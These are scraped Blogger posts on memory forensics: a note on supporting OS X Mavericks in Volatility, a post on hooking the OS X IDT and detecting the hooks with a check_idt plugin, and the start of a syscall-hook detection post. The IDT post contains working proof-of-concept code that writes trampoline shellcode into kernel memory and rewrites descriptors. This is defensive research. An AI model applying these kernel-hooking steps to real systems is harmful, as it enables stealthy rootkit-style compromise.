[1] http://reverse.put.as/2014/03/18/teaching-rex-another-trustedbsd-trick-to-hide-from-volatility/<br />
[2] http://ref.x86asm.net/geek.html#x0F2D<br />
[3] https://github.com/siliconblade/volatility/blob/master/mac/check_shadow_trustedbsd.py<br />
<div>
<br /></div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-74406358976503432572013-10-31T13:42:00.002-07:002013-11-01T16:38:18.897-07:00How to get Volatility working with OS X Mavericks?<div>Update: The Volatility Team has included my code changes so just grab the latest code to work on a Mavericks or 10.8.5 sample. You will still need the profiles below.</div><div><br></div>Until Volatility officially supports OS X Mavericks and Mountain Lion 10.8.5, here are the steps to get it going:<br>
<div>
<br></div>
<div>
<ol>
<li>Check out the latest Volatility code from the repository (v2.3):
<pre>svn checkout http://volatility.googlecode.com/svn/trunk/ volatility-read-only</pre></li>
<li>Download the following files and place them in their respective folders:
<table>
<thead><tr><th>File</th><th>Destination</th></tr></thead>
<tbody>
<tr><td><a href="https://github.com/siliconblade/volatility/blob/master/mac/profiles/Mavericks_10.9_AMD.zip" target="_blank">Mavericks_10.9_AMD.zip</a></td><td>volatility-read-only/volatility/plugins/overlays/mac/Mavericks_10.9_AMD.zip</td></tr>
<tr><td><a href="https://github.com/siliconblade/volatility/blob/master/mac/profiles/MountainLion_10.8.5_AMD.zip" target="_blank">MountainLion_10.8.5_AMD.zip</a></td><td>volatility-read-only/volatility/plugins/overlays/mac/MountainLion_10.8.5_AMD.zip</td></tr>
<tr><td><a href="https://github.com/siliconblade/volatility/blob/master/mac/mavericks-support/common.py" target="_blank">common.py</a></td><td>volatility-read-only/volatility/plugins/mac/common.py</td></tr>
<tr><td><a href="https://github.com/siliconblade/volatility/blob/master/mac/mavericks-support/lsof.py" target="_blank">lsof.py</a></td><td>volatility-read-only/volatility/plugins/mac/lsof.py</td></tr>
<tr><td><a href="https://github.com/siliconblade/volatility/blob/master/mac/mavericks-support/netstat.py">netstat.py</a></td><td>volatility-read-only/volatility/plugins/mac/netstat.py</td></tr>
</tbody>
</table></li>
<li>And you should be done! It looks like only the check_trap_table plugin has issues, but that should be taken care of soon. Have fun!</li>
</ol>
</div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-68714800847023172262013-07-27T21:51:00.001-07:002013-07-28T14:18:40.752-07:00Hooking IDT in OS X and Detection<div class="separator" style="clear: both; text-align: center;">
</div>
<h2>
Summary</h2>
<div>
Continuing on the hooking all stuff OS X theme, in this post I'll discuss hooking the Interrupt Descriptor Table (IDT) and detecting these hooks with my check_idt plugin, which can be found in <b><a href="https://github.com/siliconblade/volatility/blob/master/mac/check_idt.py" target="_blank">github</a></b>. The hooking techniques that I'll use are modifying the IDT entry to point to a shellcode instead of its handler, and modifying the handler itself by inlining it.<br />
<br />
<a name='more'></a><br /></div>
<h2>
What is IDT?</h2>
<div>
The IDT associates each interrupt or exception vector with a gate descriptor that holds the address of the code servicing that event. What is an interrupt? An interrupt is usually defined as an event that alters the sequence of instructions executed by a processor. Each interrupt or exception is identified by a vector number between 0 and 255. The IDT can contain Interrupt Gates and Trap Gates (and, in 32-bit mode, Task Gates). It is desirable to hook at this level because it can provide us with ring 0 access. You can get more information about IDT <a href="http://wiki.osdev.org/Interrupt_Descriptor_Table" target="_blank">here</a> and <a href="http://pdos.csail.mit.edu/6.828/2008/readings/i386/s09_04.htm" target="_blank">here</a>. Below are the 64 bit structs of a descriptor and a gate as represented by the Volatility Framework:</div>
<div>
<pre><span style="font-size: xx-small;">'real_descriptor64' (16 bytes)
0x0 : base_low16 ['BitField', {'end_bit': 32, 'start_bit': 16}]
0x0 : limit_low16 ['BitField', {'end_bit': 16, 'start_bit': 0}]
0x4 : access8 ['BitField', {'end_bit': 16, 'start_bit': 8}]
0x4 : base_high8 ['BitField', {'end_bit': 32, 'start_bit': 24}]
0x4 : base_med8 ['BitField', {'end_bit': 8, 'start_bit': 0}]
0x4 : granularity4 ['BitField', {'end_bit': 24, 'start_bit': 20}]
0x4 : limit_high4 ['BitField', {'end_bit': 20, 'start_bit': 16}]
0x8 : base_top32 ['unsigned int']
0xc : reserved32 ['unsigned int']
'real_gate64' (16 bytes)
0x0 : offset_low16 ['BitField', {'end_bit': 16, 'start_bit': 0}]
0x0 : selector16 ['BitField', {'end_bit': 32, 'start_bit': 16}]
0x4 : IST ['BitField', {'end_bit': 3, 'start_bit': 0}]
0x4 : access8 ['BitField', {'end_bit': 16, 'start_bit': 8}]
0x4 : offset_high16 ['BitField', {'end_bit': 32, 'start_bit': 16}]
0x4 : zeroes5 ['BitField', {'end_bit': 8, 'start_bit': 3}]
0x8 : offset_top32 ['unsigned int']
0xc : reserved32 ['unsigned int']</span></pre>
</div>
<h2>
Hooking the IDT Descriptor</h2>
<div>
To understand how to hook at the descriptor level, let's look at how the handler's address is derived from the descriptor (as usual using Volatility's <a href="https://code.google.com/p/volatility/wiki/MacCommandReference23#mac_volshell" target="_blank">mac_volshell</a> interface on an OS X 10.8.3 x64 VM):</div>
<div>
<pre><span style="font-size: xx-small;">32 bit:
handler_addr = real_gate64.offset_low16 + (real_gate64.offset_high16 << 16)

64 bit:
handler_addr = real_gate64.offset_low16 + (real_gate64.offset_high16 << 16) + (real_gate64.offset_top32 << 32)</span></pre>
</div>
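As an added example (not the post's code and not part of the check_idt plugin), the Python 3 snippet below unpacks a raw 16-byte real_gate64 using the field layout listed above, derives the handler address with the 64-bit formula, and applies the descriptor-level check that the Detection section later in this post describes: the handler must fall inside the kernel image and resolve to a known symbol. The clean gate bytes are constructed from the _idt64_zero_div handler address reported later in this post, the hooked gate points at the kext stub address used there, and the kernel text bounds are an assumed placeholder.<br />

```python
import struct

# real_gate64 as laid out in the Volatility vtypes above (16 bytes):
#   0x0 offset_low16, selector16
#   0x4 IST (bits 0-2) + zeroes5 (bits 3-7), access8, offset_high16
#   0x8 offset_top32
#   0xc reserved32
GATE_FMT = "<HHBBHII"
GATE_SIZE = struct.calcsize(GATE_FMT)  # 16


def parse_gate(raw):
    """Unpack one IDT entry into its named fields."""
    if len(raw) != GATE_SIZE:
        raise ValueError("real_gate64 is %d bytes, got %d" % (GATE_SIZE, len(raw)))
    low, sel, ist_byte, access, high, top, _reserved = struct.unpack(GATE_FMT, raw)
    return {
        "offset_low16": low,
        "selector16": sel,
        "IST": ist_byte & 0x7,
        "access8": access,
        "offset_high16": high,
        "offset_top32": top,
    }


def handler_address(gate):
    """The 64-bit formula from the post: low16 | high16 << 16 | top32 << 32."""
    return (gate["offset_low16"]
            | (gate["offset_high16"] << 16)
            | (gate["offset_top32"] << 32))


def gate_dpl(gate):
    """Descriptor privilege level (ring) from bits 5-6 of the access byte."""
    return (gate["access8"] >> 5) & 0x3


def check_descriptor(raw, known_handlers, kernel_text):
    """Descriptor-level check in the spirit of check_idt: the handler must lie
    inside the kernel image and resolve to a known idt64_* symbol."""
    gate = parse_gate(raw)
    addr = handler_address(gate)
    lo, hi = kernel_text
    name = known_handlers.get(addr)
    status = "OK" if (lo <= addr < hi and name is not None) else "Hooked"
    return status, addr, name


def build_gate(handler, selector=0x08, ist=0, access=0x8e):
    """Pack a gate for a given handler; used here only to construct sample input."""
    return struct.pack(GATE_FMT, handler & 0xFFFF, selector, ist & 0x7, access,
                       (handler >> 16) & 0xFFFF, (handler >> 32) & 0xFFFFFFFF, 0)


# Constructed sample data. The handler addresses are the ones the post's first
# check_idt run reported; KERNEL_TEXT is an ASSUMED placeholder range, and
# STUB_ADDR is the kext location the post uses as its hook target.
KNOWN_HANDLERS = {
    0xffffff80014cac20: "_idt64_zero_div",
    0xffffff80014cd140: "_idt64_stack_fault",
}
KERNEL_TEXT = (0xffffff8001200000, 0xffffff8001800000)  # assumed bounds
STUB_ADDR = 0xffffff7f82bba6e5

# Raw bytes of the clean _idt64_zero_div gate: offset 0xac20 / 0x014c / 0xffffff80,
# selector 0x08, IST 0, access 0x8e (present, DPL 0, 64-bit interrupt gate).
CLEAN_GATE = bytes.fromhex("20ac0800008e4c0180ffffff00000000")
HOOKED_GATE = build_gate(STUB_ADDR)

if __name__ == "__main__":
    for label, raw in (("clean", CLEAN_GATE), ("hooked", HOOKED_GATE)):
        status, addr, name = check_descriptor(raw, KNOWN_HANDLERS, KERNEL_TEXT)
        print("%-6s handler=%#018x ring=%d symbol=%s -> %s"
              % (label, addr, gate_dpl(parse_gate(raw)), name, status))
```

In a real plugin `KNOWN_HANDLERS` and `KERNEL_TEXT` come from the profile's symbol table and the kernel's load address; the range check alone already catches the post's hook, because the stub lives in the kext region (0xffffff7f...) rather than the kernel (0xffffff80...).<br />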
<div>
So to hook the handler, the descriptor's fields will be loaded with parts of the target address that contains the shellcode. As in the <a href="http://siliconblade.blogspot.com/2013/07/offensive-volatility-messing-with-os-x.html" target="_blank">previous post</a> that talked about offensive techniques, I'll target the kext "com.vmware.kext.vmhgfs," specifically the __text section.<br />
<pre><span style="font-size: xx-small;">>>> #get address for the kernel extension (kext) list
>>> p = self.addrspace.profile.get_symbol("_kmod")
>>> kmodaddr = obj.Object("Pointer", offset = p, vm = self.addrspace)
>>> kmod = kmodaddr.dereference_as("kmod_info")
>>> #loop thru list to find suitable target to place the trampoline in
>>> while kmod.is_valid():
...     str(kmod.name)
...     if str(kmod.name) == "com.vmware.kext.vmhgfs":
...         mh = obj.Object('mach_header_64', offset = kmod.address,vm = self.addrspace)
...         o = mh.obj_offset
...         # skip header data
...         o += 32
...         txt_data_end = 0
...         # loop thru segments to find __TEXT
...         for i in xrange(0, mh.ncmds):
...             seg = obj.Object('segment_command_64', offset = o, vm = self.addrspace)
...             if seg.cmd not in [0x26]:
...                 for j in xrange(0, seg.nsects):
...                     sect = obj.Object('section_64', offset = o + 0x48 + 80*(j), vm = self.addrspace)
...                     sect_name = "".join(map(str, sect.sectname)).strip(' \t\r\n\0')
...                     # find __text section
...                     if seg.cmd == 0x19 and str(seg.segname) == "__TEXT" and sect_name == "__text":
...                         print "{0:#10x} {1:#2x} {2} {3}".format(sect.addr,seg.cmd, seg.segname, sect_name)
...                         txt_data_end = sect.addr + sect.m('size') - 50
...                         break
...             if txt_data_end != 0:
...                 break
...         print "The fake idt handler will be at {0:#10x}".format(txt_data_end)
...         break
...     kmod = kmod.next
...
'com.apple.driver.AudioAUUC'
'com.vmware.kext.vmhgfs'
0xffffff7f82bb2928 0x19 __TEXT __text
The fake idt handler will be at <b>0xffffff7f82bba6e5</b></span></pre>
</div>
To demonstrate this type of hooking I'll route the idt64_zero_div handler to the idt64_stack_fault handler by using a MOV/JMP trampoline. Before doing that, I'll need to get the addresses of these entities using my slightly modified check_idt plugin (added ent to the yield statement in the calculate method):<br />
<pre><span style="font-size: xx-small;">>>> import volatility.plugins.mac.check_idt as idt
>>> idto = idt.mac_check_idt(self._config)
>>> for i in idto.calculate():
... "Name {0} Descriptor address: {1:#10x}, Handler address {2:#10x}".format(i[3], i[9].obj_offset, i[2])
...
'Name _idt64_zero_div Descriptor address: <b>0xffffff8001306000</b>, Handler address <b>0xffffff80014cac20</b>'
...
'Name _idt64_stack_fault Descriptor address: <b>0xffffff80013060c0</b>, Handler address <b>0xffffff80014cd140</b>'</span>
</pre>
Now that all the required addresses are present, I can modify the shellcode to trampoline into idt64_stack_fault (0xffffff80014cd140) and inject it to the target location (0xffffff7f82bba6e5).<br />
<pre><span style="font-size: xx-small;">>>> import binascii
>>> buf = "\x48\xB8\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xE0".encode("hex").replace("0000000000000000",struct.pack("<Q", <b>0xffffff80014cd140</b>).encode('hex'))
>>> self.addrspace.write(<b>0xffffff7f82bba6e5</b> ,binascii.unhexlify(buf))</span></pre>
<pre><span style="font-size: xx-small;">True</span></pre>
With the shellcode in place, the IDT descriptor can be modified to point to it:<br />
<pre><span style="font-size: xx-small;">>>> stub_addr = <b>0xffffff7f82bba6e5</b>
>>> idt_addr = <b>0xffffff8001306000</b>
>>> idt_entry = obj.Object('real_gate64', offset = idt_addr, vm=self.addrspace)
>>> self.addrspace.write(idt_entry.obj_offset,struct.pack('<H', stub_addr & 0xFFFF))
True
>>> self.addrspace.write(idt_entry.offset_high16.obj_offset + 2,struct.pack("<H", (stub_addr >> 16) & 0xFFFF))
True
>>> self.addrspace.write(idt_entry.obj_offset+8,struct.pack("<I", stub_addr >> 32))
True</span>
</pre>
I'll need some code to trigger the division by zero exception:<br />
<pre><span style="font-size: xx-small;">#include <stdio.h>

int main()
{
    int x = 2, y = 0;
    printf("X/Y = %i\n", x / y);
    return 0;
}</span>
</pre>
Running the division by zero code before and after hooking will result in the following:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZhyksIJfSg3Me7y9RvyGmE9RAqY3QXF5JOep27bqi19FDHoxBRiRFyc15wxEFNANCr1rZ4YSR2wLKO2fESrUsQ1EqJO-Ug41vquEFB6eKCwTH8ajmLVN5MXKi_RFpesNuoR2e0vpq7WsQ/s1600/Screen+Shot+2013-07-27+at+12.20.28+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZhyksIJfSg3Me7y9RvyGmE9RAqY3QXF5JOep27bqi19FDHoxBRiRFyc15wxEFNANCr1rZ4YSR2wLKO2fESrUsQ1EqJO-Ug41vquEFB6eKCwTH8ajmLVN5MXKi_RFpesNuoR2e0vpq7WsQ/s320/Screen+Shot+2013-07-27+at+12.20.28+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Output Before Hooking (zero division exception)</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhoV0EIrPORFxpO9MjHzdb3sO0qdNlSPheVIetdql5s_7mQED4tlI-QmQcTrAomRscFZCc4VD8J6KXpQRHDJxy2tc97yDA4n0tgGHeHDnOoAGWYP1TIdNDz4PHXZPAGOU1PrAjJ9ZoAZVp/s1600/Screen+Shot+2013-07-27+at+12.22.09+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhoV0EIrPORFxpO9MjHzdb3sO0qdNlSPheVIetdql5s_7mQED4tlI-QmQcTrAomRscFZCc4VD8J6KXpQRHDJxy2tc97yDA4n0tgGHeHDnOoAGWYP1TIdNDz4PHXZPAGOU1PrAjJ9ZoAZVp/s320/Screen+Shot+2013-07-27+at+12.22.09+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Output After Hooking (stack fault exception)</td></tr>
</tbody></table>
The hook worked without crashing the system so there is room for more useful shellcoding ;)<br />
<h2>
Hooking the IDT Handler</h2>
<div>
In this technique, instead of hooking the idt64_zero_div entry's descriptor, I'll inline the handler itself by overwriting the top instructions with a MOV/JMP trampoline into the handler of the idt_stack_fault entry. The address of the handler found within the descriptor will remain the same. This will be important from a detection standpoint.<br />
<br />
After restarting the system to get a fresh start, I ran the script below to get the descriptor and handler information for the entries involved:<br />
<pre><span style="font-size: xx-small;">>>> import volatility.plugins.mac.check_idt as idt
>>> idto = idt.mac_check_idt(self._config)
>>> for i in idto.calculate():
... "Name {0} Descriptor address: {1:#10x}, Handler address {2:#10x}".format(i[3], i[9].obj_offset, i[2])
...
'Name _idt64_zero_div Descriptor address: <b>0xffffff8026506000</b>, Handler address <b>0xffffff80266cac20</b>'
...
'Name _idt64_stack_fault Descriptor address: <b>0xffffff80265060c0</b>, Handler address <b>0xffffff80266cd140</b>'</span>
</pre>
Now I can modify the shellcode with idt_stack_fault's handler address (0xffffff80266cd140) and inject it to idt64_zero_div's handler (0xffffff80266cac20):<br />
<pre><span style="font-size: xx-small;">>>> import binascii
>>> buf = "\x48\xB8\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xE0".encode("hex").replace("0000000000000000",struct.pack("<Q", <b>0xffffff80266cd140</b>).encode('hex'))
>>> self.addrspace.write(0xffffff80266cac20 ,binascii.unhexlify(buf))
True</span></pre>
Here's the output for before and after hooking:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvvOOM7CN4pQZ2-NqR47azVpmUZsIQpL1nEcymBtpCobz-LSfG70SBetgbd9RnZw5X2NfQS_mAaWbUAH8yHNOy6TLSQjh-W4Z0D6Rfd0JHZAwbtoMsCUPAb2C1uMev0ZUyMgEZ2I0NMs-E/s1600/Screen+Shot+2013-07-27+at+10.50.36+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvvOOM7CN4pQZ2-NqR47azVpmUZsIQpL1nEcymBtpCobz-LSfG70SBetgbd9RnZw5X2NfQS_mAaWbUAH8yHNOy6TLSQjh-W4Z0D6Rfd0JHZAwbtoMsCUPAb2C1uMev0ZUyMgEZ2I0NMs-E/s320/Screen+Shot+2013-07-27+at+10.50.36+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Before and After Inline hooking</td></tr>
</tbody></table>
Once more the hook worked without crashing the system.<br />
<h2>
Detection</h2>
</div>
After showing that these attacks are possible on OS X 10.8.3, I'll use my <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_idt.py" target="_blank">check_idt</a> plugin to detect each one of them.<br />
<br />
To detect a modified descriptor, the check_idt plugin checks to see if the handler's address is in the kernel, if the address refers to a known symbol, and if it starts with known strings. The result of a scan on the VM's memory with a hooked idt64_zero_div descriptor is as follows:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3pWlbIYIHskL0W3n3qawQqUsfm84OcFQ6A6JQeI0GlD95dskcHWQNRjw-XR-HADlNzi2vC_CkYT5NTWAfP8pn6UbU9FSyL9w1CUIwPTlyrJNeXiltuse6Zd6r9nKuGG3BEho0OZK8wOSV/s1600/Screen+Shot+2013-07-25+at+4.34.53+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="22" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3pWlbIYIHskL0W3n3qawQqUsfm84OcFQ6A6JQeI0GlD95dskcHWQNRjw-XR-HADlNzi2vC_CkYT5NTWAfP8pn6UbU9FSyL9w1CUIwPTlyrJNeXiltuse6Zd6r9nKuGG3BEho0OZK8wOSV/s320/Screen+Shot+2013-07-25+at+4.34.53+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">check_idt Results for a Hooked IDT Descriptor (idt64_zero_div)</td></tr>
</tbody></table>
As seen in the screenshot, the results show the entry number, handler address, symbol name, access level (as in ring 0/1/2/3), selector, module/kext for the handler, descriptor hook status, and handler inline hook status. Both the 'Hooked' and 'Inlined' statuses indicate that the entry has been hooked.<br />
To detect an inlined handler, the check_idt plugin looks for specific instructions found in a regular handler, such as LEA RAX, [RIP+0x2d4], and checks whether the RIP-relative address (e.g. [RIP+0x2d4]) resolves to a proper handler function (e.g. hndl_allintrs).<br />
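As an added example (not the plugin's code), the Python 3 snippet below shows the inline check on the first bytes of a handler: a MOV RAX, imm64 / JMP RAX trampoline (the shape used in this post) is reported as inlined together with its destination, while a RIP-relative LEA is resolved with the same next-instruction displacement arithmetic and accepted only if it lands on a known hndl_* routine. The handler addresses are the ones from the second check_idt run above; the hndl_allintrs address and the clean prologue bytes are assumed for the example.<br />

```python
import struct

MASK64 = 0xFFFFFFFFFFFFFFFF


def inspect_handler(handler_addr, code, known_targets):
    """Classify the leading bytes of an IDT handler.

    Returns one of:
      ('inlined', dest)      code starts with MOV RAX, imm64 (48 b8 <imm64>) followed
                             by JMP RAX (ff e0); dest is where the trampoline goes.
      ('OK', target)         a LEA RAX, [RIP+disp32] (48 8d 05) is present and its
                             target is a known hndl_* routine.
      ('suspicious', x)      the LEA points somewhere unexpected, or is missing (x=None).
    """
    if code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":
        (dest,) = struct.unpack("<Q", code[2:10])
        return "inlined", dest
    idx = code.find(b"\x48\x8d\x05")
    if idx < 0 or idx + 7 > len(code):
        return "suspicious", None
    (disp,) = struct.unpack("<i", code[idx + 3:idx + 7])      # signed disp32
    target = (handler_addr + idx + 7 + disp) & MASK64          # relative to next insn
    return ("OK" if target in known_targets else "suspicious"), target


# Constructed sample input. Handler addresses are the ones the post's second
# check_idt run reported; HNDL_ALLINTRS and the clean prologue are ASSUMED.
ZERO_DIV = 0xffffff80266cac20
STACK_FAULT = 0xffffff80266cd140
HNDL_ALLINTRS = ZERO_DIV + 7 + 0x2d4                 # where LEA RAX, [RIP+0x2d4] lands
KNOWN_TARGETS = {HNDL_ALLINTRS: "hndl_allintrs"}

CLEAN_PROLOGUE = bytes.fromhex("488d05d4020000")     # LEA RAX, [RIP+0x2d4]
INLINED_PROLOGUE = b"\x48\xb8" + struct.pack("<Q", STACK_FAULT) + b"\xff\xe0"

if __name__ == "__main__":
    for label, code in (("clean", CLEAN_PROLOGUE), ("inlined", INLINED_PROLOGUE)):
        status, where = inspect_handler(ZERO_DIV, code, KNOWN_TARGETS)
        print("%-8s %-10s %s" % (label, status, "-" if where is None else "%#018x" % where))
```

The byte-pattern search for the LEA is deliberately simple; a production check would disassemble the prologue instruction by instruction so that a displacement byte happening to contain 48 8d 05 cannot produce a false match.<br />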
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW7NwYyJ5DAVeMw8w5ZsyoTWP9_ATUtFbWzg6izMN5HGbGjtROTIsB_oZzXTJndEDi29F-57Tv6ZWydhS9KFnGK7m2dcyYDcTgvtoOsDwjlC0qc-qJQc3ZIkIVBJYP8JKr_HY9xa3z4dSx/s1600/Screen+Shot+2013-07-27+at+11.37.04+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="82" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW7NwYyJ5DAVeMw8w5ZsyoTWP9_ATUtFbWzg6izMN5HGbGjtROTIsB_oZzXTJndEDi29F-57Tv6ZWydhS9KFnGK7m2dcyYDcTgvtoOsDwjlC0qc-qJQc3ZIkIVBJYP8JKr_HY9xa3z4dSx/s320/Screen+Shot+2013-07-27+at+11.37.04+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Regular Handler Disassembly (idt64_debug) </td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNLy0HChYyGDMLa3MZ3wY_QnSqaQS7Br4Za56GlYnJKdk3LT1ui1TDDU5YcwKFrGExn5JKm9nDBXBd6Kxod6nvqWhIICos6jxprr9KO7NIjUR3oLuWIVpjRmBK5V_58VF4x_EfFKxgfvyj/s1600/Screen+Shot+2013-07-27+at+11.37.29+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNLy0HChYyGDMLa3MZ3wY_QnSqaQS7Br4Za56GlYnJKdk3LT1ui1TDDU5YcwKFrGExn5JKm9nDBXBd6Kxod6nvqWhIICos6jxprr9KO7NIjUR3oLuWIVpjRmBK5V_58VF4x_EfFKxgfvyj/s320/Screen+Shot+2013-07-27+at+11.37.29+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Hooked Handler Disassembly (idt64_zero_div)</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXTj1TwuuEyo0UxVNa-gzpJrADo3RqCdtc5dnoYRMCZJA0lXp9QmuBKLHWX6lkhmISxIbGHpMLU4dFHAIUgj6dWBxhni8v8c6milPJPqh83kjYBo8Raqj-J4bOZFbcWuW6nucViI4MavpL/s1600/Screen+Shot+2013-07-27+at+11.00.44+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXTj1TwuuEyo0UxVNa-gzpJrADo3RqCdtc5dnoYRMCZJA0lXp9QmuBKLHWX6lkhmISxIbGHpMLU4dFHAIUgj6dWBxhni8v8c6milPJPqh83kjYBo8Raqj-J4bOZFbcWuW6nucViI4MavpL/s320/Screen+Shot+2013-07-27+at+11.00.44+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">check_idt Results for a Hooked IDT Handler (idt64_zero_div)</td></tr>
</tbody></table>
The screenshot of the check_idt plugin's results shows that the IDT entry name is known and the descriptor itself appears unmodified. The plugin also shows, however, that the entry's handler has been inlined.<br />
<br />
Are there any other tools that detect IDT modifications for OS X? Yes and no. @osxreverser had <a href="http://reverse.put.as/2012/01/10/a-mac-os-x-port-of-phracks-checkidt-util-by-kad-or-another-way-to-retrieve-sysent-address/" target="_blank">modified</a> checkidt, a tool <a href="http://www.phrack.org/issues.html?issue=59&id=4" target="_blank">originally written</a> for Linux, so it could run on OS X. While the tool can detect a modified descriptor, it can't detect an inlined handler. The tool also has some difficulty running on x64 systems due to issues with /dev/kmem (it works great on x86).<br />
<h2>
Conclusion</h2>
<div>
In this post I have shown two ways to hook the IDT and how to detect these hooks using my <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_idt.py" target="_blank">check_idt</a> plugin. Volatility again has proven to be a flexible tool in developing POC attacks and detecting them. One interesting note: the IDT is protected on <a href="http://msdn.microsoft.com/en-us/library/windows/hardware/gg487350.aspx" target="_blank">x64 Windows</a> systems and hooking will generate a bug check and shut down the system. Maybe OS X needs to do some catching up? </div>siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-51842301561855902532013-07-13T22:20:00.002-07:002013-07-15T10:41:18.015-07:00Back to Defense: Finding Hooks in OS X with Volatility<h2>
Summary</h2>
<div>
In my <a href="http://siliconblade.blogspot.com/2013/07/offensive-volatility-messing-with-os-x.html" target="_blank">previous post</a> I discussed how to mess with the OS X syscall table through direct syscall table modification, syscall function inlining, and patching the syscall handler. As I promised, I'll be providing a plugin to find the mess! The code for the check_hooks plugin can be found at <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py" target="_blank">github</a> and it incorporates existing detections for the sake of completeness. So let's go through the scenarios discussed earlier.<br />
<br />
<a name='more'></a><br /></div>
<h2>
Syscall Interception by Directly Modifying the Syscall Table</h2>
<b>- Replacing a Syscall with Another Syscall</b><br />
Detecting a duplicate syscall entry is straightforward: keep track of the syscall handlers as they are listed and see if one appears twice. The example I'll be using was discussed in my previous post: replacing the setuid function with the exit function:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEog8iRgDTXaT0R_3XS1Z1NBPSyiCJFrHp_BSPQrWsDLJkEgGffRsKgFulwMrao3HOgRLtiZptBtCSWTcaQWCmQmIKqSguYfHSRlcwh26SH0g10xAlaoZ7m7inL5Hmqt1cosCE4L75QK7/s1600/Screen+Shot+2013-07-13+at+9.15.18+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="19" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEog8iRgDTXaT0R_3XS1Z1NBPSyiCJFrHp_BSPQrWsDLJkEgGffRsKgFulwMrao3HOgRLtiZptBtCSWTcaQWCmQmIKqSguYfHSRlcwh26SH0g10xAlaoZ7m7inL5Hmqt1cosCE4L75QK7/s320/Screen+Shot+2013-07-13+at+9.15.18+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Duplicate syscall function detection</td></tr>
</tbody></table>
<br />
<b>- Replacing a Syscall with a DTrace hook</b><br />
This one is an easy catch as well: I just check whether the syscall name contains the word 'dtrace' to detect syscall and mach_trap <a href="http://siliconblade.blogspot.com/2013/05/checkdtrace-volatility-plugin-arises.html" target="_blank">DTrace hooks</a>.<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
